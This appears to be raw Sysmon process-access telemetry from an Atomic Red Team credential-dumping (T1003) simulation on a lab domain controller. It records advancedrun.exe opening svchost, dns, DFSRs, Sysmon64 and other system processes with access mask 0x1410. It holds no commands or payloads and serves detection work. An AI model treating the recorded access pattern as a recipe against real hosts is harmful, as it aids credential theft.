17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
